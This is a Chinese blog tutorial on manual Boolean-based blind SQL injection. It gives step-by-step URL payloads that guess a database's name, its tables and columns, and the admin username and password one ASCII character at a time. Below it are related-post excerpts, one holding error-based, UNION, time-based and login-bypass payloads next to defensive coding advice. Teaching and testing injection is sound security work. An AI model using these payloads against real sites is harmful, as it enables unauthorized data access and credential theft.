布尔盲注手注

最新推荐文章于 2025-10-07 12:34:29 发布
原创 最新推荐文章于 2025-10-07 12:34:29 发布 · 414 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql注入

本文深入探讨了SQL盲注的基本原理和技术,包括如何利用布尔盲注进行数据库信息的爆破,如数据库名称、表名、字段名及数据的逐字猜解。通过实例演示了如何使用ASCII码和字符串截取函数进行有效攻击。

布尔盲注
mid(str,1,3)字符串截取 意思就是把str这个字符串从第一个字符串开始,截取前三个显示
substr()这个函数和上面的用法一样,也是用来截取字符串的
ORD()转换成ascii码
Length()统计长度
version()是查看数据库版本
database()查看当前数据库名
user() 查看当前用户

猜解数据库名字的时候可以使用ORD(mid(database(),1,1))>1这种截取当前数据库的名字的第一个字符将其转换为ascii码来查看,如果不转换为ascii的话,他可能就是字符,数字和特殊字符,太难猜了。

当进行sql注入的时候:
例如www.aaa.com/a.php?id=1,在这个地方进行过测试后,发现这个get型有注入点后,可以使用www.aaa.com/a.php?id=1’ and (length(database()))>5 --,这种来爆破当前数据库名称的长度,例如当>7页面返回正常,>8页面返回不正常,所以当前数据库名称的长度为8。

然后我们就需要去一个个的爆破数据库名称,www.aaa.com/a.php?id=1’ and ascii(substr(database(),1,1))>100来猜测字母,这个测试出来的是第一个字母的ascii的值,www.aaa.com/a.php?id=1’ and ascii(substr(database(),2,1))>100测试的就是第二个字母了。

第三步就是来爆破当前数据库有多少个表,例如www.aaa.com/a.php?id=1’ and (select count(*)from information_schema.tables where table_schema=database())>1–
来猜测表的数量。

当得知表的数量以后我们肯定就要去爆破表的名称,爆破表的名称和上面爆破数据库的名称一样,就是一个个的爆破字母,首先要得知表名的长度,例如www.aaa.com/a.php?id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5,limit限制的是我们提取的是第一个表的长度,也就是0的意思,后面1的意思是第一个表的意思。
开始测试第一个表的第一个字母,例如www.aaa.com/a.php?id=1’ and (select ascii (substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)>100 --,然后就是把0换为1就是第二个表的第一个字母开始爆破,然后爆破账号密码都是按照这个模式进行爆破的.

截取当前数据库用户名的第一位字符并返回其ascii值
www.aaa.com/a.php?id=1’and (select ascii(substring((select user()),1,1))=119) –

有了管理表名,下一步就该把该表中的所有字段名都查出来了,依旧是上面的方法
查询’tabl_admin_user’表中的第一个字段名的第一位字符,并返回其对应的ASCII码值,最后确认实际的账号密码字段名分别为’admin_username’,’admin_password’
http://www.aaa.com/a.php?id=1’ and (select ascii(substring((select column_name from information_schema.columns where table_name=0x74626c5f61646d696e5f75736572 limit 0,1),1,1))=97) %23

10,现在管理表名字段名都有了,下一步只需要慢慢把每个字段对应的实际数据查出来即可

获取’admin_username’字段下的第一条记录的第一位字符,并返回其对应的ASCII码值,依次递增,查出完整用户名即可
http://www.aaa.com/a.php?id=1’ and (select ascii(substring((select admin_username from tbl_admin_user limit 0,1),1,1))=119) %23
获取’admin_password’字段下的第一条记录的第一位字符,并返回其对应的ASCII码值,依次递增,查出完整密码数据即可
http:www.aaa.com/a.php?id=1’ and (select ascii(substring((select admin_password from tbl_admin_user limit 0,1),1,1))=49) %23

MySQL之布尔型
m0_52484587的博客
07-09 524
说明存在注入,而且是字符型的注入!(如果是数字型的注入,那么就不用去闭合单引号)但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。这时,我们无法根据应用程序的返回页面得到我们需要的。基于布尔型SQL即在SQL注入过程中,应用程序仅仅返回。说明当前数据库长度为。
SQL-实战布尔盲注
dkxkl1314的博客
03-09 3513
环境:win10靶场:sqli-labs-master就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
学习记录-注入布尔盲注注入
SmileAndFun的博客
07-21 1585
学习记录-布尔盲注注入:文章仅用于学术交流,不用于其它用户,不足之处,评论指出,谢谢大佬们 一、概念及原理 布尔盲注,个人理就是网站屏蔽了显错,但是可以返回true or false的页面,虽然可以注入,但是联合查询找不到输出点,只能判断对与错误,这时我们就可以尝试布尔盲注,利用true、false判断注入正确与否。 二、注入步骤 总体步骤:判断是否存在布尔盲注----布尔注入(可工也可利用工具辅助,获取表–字段—数据) 三、个人总结 1)布尔盲注方法很多,首先需要闭合参数拼接sql语句
SQL注入04】布尔盲注实例
Fighting_hawk的博客
02-19 3433
1. 理布尔注入的判断原理; 2. 掌握布尔盲注的方法。
CTFHub SQL注入通关笔记4:布尔盲注法+脚本法)
最新发布
mooyuan的网络安全博客
10-07 1067
本文详细介绍了CTFHub平台的SQL布尔盲注关卡渗透过程。首先通过1=1恒真语句确认存在SQL注入风险,由于页面只返回query_success/query_error的布尔响应,采用布尔盲注技术。注入部分,逐步探测出数据库(sqli)、表(news,flag)、列名(flag)及目标数据(ctfhub{b832...})。同时展示了使用sqlmap工具自动化渗透的方法,通过--dump参数成功获取flag值。整个渗透过程突出了布尔盲注在无直接错误回显情况下的应用技巧。
mysql_Mysql 布尔型注入
weixin_42524100的博客
01-18 728
0x00 什么叫布尔型布尔型布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。注入时页面无具体数据返回的注入称之为,一般是通过其他表现形式来判断数据的具体内容布尔型页面在执行sql语句后,只会显示两种结果,这时可通过构造逻辑表达式的sql语句来判断数据的具体内容。是不是听的云里雾里的,没关系,继续看0x01 Mysql...
墨者学院布尔盲注(超详细工和工具)
qq_43355651的博客
09-15 5075
墨者学院的在线靶场中sql注入漏洞测试(布尔盲注),因为不管是时间还是布尔盲注工的话都需要大量的经历和时间来完成,正好自己最近在学习sql注入,就决定用工做一次的测试,以便于对sql注入更深刻的理 温馨提示:此文章基于专门实验的平台下测试,任何人不得随意测试或者注入,互联网不是法外之地,任何除学习之外的事情与作者无关。 首先我们打开墨者学院在线靶场中的sql注入漏洞测试(布尔盲注) 然后找到滚动的字段打开链接寻找注入点 通过测试 and 1=1 and 1=2 之后发现存在
sql注入-布尔盲注
WolvenSec的博客
06-02 3635
布尔盲注(Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
2024年Python最全Python自动化sql注入布尔盲注_布尔盲注脚本
2301_82244514的博客
04-30 976
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表的长度 --> 获取具体的表
Pikachu布尔盲注结合BurpSuite获取数据库字详
小小小屿屿屿的博客
11-18 1027
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为根据展现方式,分为布尔型和时间型
时间
鸣蜩十四的博客
12-07 398
基于时间的: 时间的概念:使用特定函数让数据库去执行,通过自己的设定,来查看数据库是否get到我们的请求 函数sleep()设定数据库的延时或者暂停的时间 函数limit 0,1 限制第一个第一个字符 函数mid 1,1 从第一个字符开始截取,只截取一个 函数benchmark(参数一,参数二),第一是执行多少次,二是某项操作。 1、找注入点 通过输入以下两行,根据返回的延迟判断存在字符...
布尔盲注
weixin_43271438的博客
10-03 4234
布尔盲注一般是在网页没有报错,回显的时候使用。只能对url输入的判断一个对错,一般一次只能判断一个英文字符 基于布尔的(Boolean-based blind SQL injection),即可以根据返回页面判断条件真假的注入。比如对参数加一个’ and ‘1’=‘1和’ and ‘1’='2,如果第一个能查询出来,第二个不行,则说明可以注入,后面可以根据字段and exist(…)不断测...
MySQL基于布尔型常用语句
专注企业信息安全-sec
10-04 2514
什么是? 基于布尔型SQL即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 查询所有数据库 1.判断表存不存在   1   and exists(select ...
access 数据库。。。
weixin_34174132的博客
12-20 524
2019独角兽企业重金招聘Python工程师标准>>> ...
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 480
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须测表列名。Access只有联合注入布尔盲注。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
sql注入知识---布尔型
尘玥的故事
04-08 858
一般的情况下我们面对这种都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
SQL Injection (Blind)
angry_program的博客
02-08 594
前言 SQL,即SQL Injection(Blind),与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果(错误回显),而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或...
SQL布尔盲注
Dug123456_的博客
04-07 4006
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表全是小写英文字符)尝试获取每个表的表。1 and length(database())=4 //判断数据库字的长度是否为4。
sql注入
04-01
<think>好的,我现在需要处理用户关于SQL注入动攻击方法和防御技巧的查询。首先,我得回顾一下用户提供的引用内容,看看有哪些相关的信息可以利用。引用1提到了使用sqlmap进行自动化注入,以及防御措施。引用2和4讨论了常见的攻击入口点,比如登录页面、搜索功能,以及如何利用UNION查询进行攻击。引用3详细释了一个具体的注入语句,使用updatexml函数来获取信息。 用户的需求是学习动攻击方法和防御段,所以需要分两部分来回答。首先,动攻击方法部分需要涵盖常见的注入类型,比如基于错误的注入、联合查询注入布尔盲注和时间。然后,防御技巧部分需要包括参数化查询、输入验证、最小权限原则等。 在动攻击方法中,需要详细说明每种攻击的具体步骤和示例。例如,基于错误的注入可以利用数据库报错信息,比如使用updatexml函数触发错误,从而泄露数据。联合查询注入则需要确定列数,然后通过UNION SELECT获取数据。布尔盲注和时间则适用于没有明显错误回显的情况,通过真假的页面响应或时间延迟来判断。 防御方面,参数化查询是最有效的措施,可以防止SQL注入的结构被改变。输入验证和过滤也很重要,比如过滤特殊字符。此外,使用最小权限的数据库账户和错误处理机制也能减少风险。Web应用防火墙(WAF)和定期安全测试也是必要的补充措施。 需要确保回答结构清晰,分点列出,每个部分都有具体的例子和释。同时,引用的内容要自然地融入回答中,比如在讨论错误注入时引用3的例子,或者在提到登录页面攻击时引用2和4的内容。最后,生成的相关问题要覆盖攻击和防御的各个方面,帮助用户进一步深入学习。</think>### SQL注入动攻击方法与防御技巧详 #### 一、SQL注入攻击方法 1. **基于错误的注入** - 核心方法:通过构造特殊输入触发数据库报错,直接获取敏感信息 - 示例攻击: ```sql ' AND updatexml(1,concat(0x7e,(SELECT @@version)),1)-- ``` 该语句利用MySQL的`updatexml`函数触发XML析错误,回显数据库版本信息[^3] 2. **联合查询注入(UNION-based)** - 攻击步骤: 1. 确定字段数量:`' ORDER BY 3--` 2. 判断回显位置:`' UNION SELECT 1,2,3--` 3. 获取数据:`' UNION SELECT user(),database(),version()--` 4. 提取表数据: ```sql -1' UNION SELECT 1,group_concat(username,':',password),3 FROM users-- ``` 该语句通过`group_concat`合并查询结果,常用于登录凭证窃取[^4] 3. **布尔盲注(Boolean-based)** - 原理:通过页面响应判断SQL条件真假 - 示例: ```sql ' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a'-- ``` 逐个字符密码字段值 4. **时间(Time-based)** - 特征:无直接回显时使用时间延迟判断 - 示例: ```sql '; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:5'-- ``` 通过页面响应时间判断条件是否成立 #### 二、关键攻击入口点 1. 登录表单:`' OR 1=1--` 绕过认证[^2] 2. 搜索框:`%' AND 1=0 UNION SELECT 1,@@version,3 -- ` 3. URL参数:`?id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- ` #### 三、防御技巧与实践 1. **参数化查询(Prepared Statements)** - 强制区分代码与数据,例如Python实现: ```python cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) ``` 2. **输入验证与过滤** - 白单验证:对数字类型参数使用类型转换 - 特殊字符过滤:正则表达式过滤`'";<>()`等符号 - 示例正则:`/^[a-zA-Z0-9_@.]+$/` 3. **最小权限原则** - 数据库账户仅授予必要权限 - 禁止使用`root`/`sa`等特权账户连接应用 4. **错误处理机制** - 禁止显示详细错误信息 - 自定义统一错误页面 5. **纵深防御体系** - 部署WAF(Web应用防火墙) - 使用安全框架:如Java Spring Security、PHP Laravel Eloquent ORM - 定期渗透测试:使用sqlmap等工具进行自动化检测[^1] 6. **安全编码规范** ```php // 错误示例 $query = "SELECT * FROM users WHERE name = '$_GET[name]'"; // 正确示例 $stmt = $pdo->prepare("SELECT * FROM users WHERE name = ?"); $stmt->execute([$_GET['name']]); ``` #### 四、实战检测方法 1. 输入单引号`'`测试错误回显 2. 使用`AND 1=1`与`AND 1=2`比较响应差异 3. 测试时间延迟语句响应时间
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值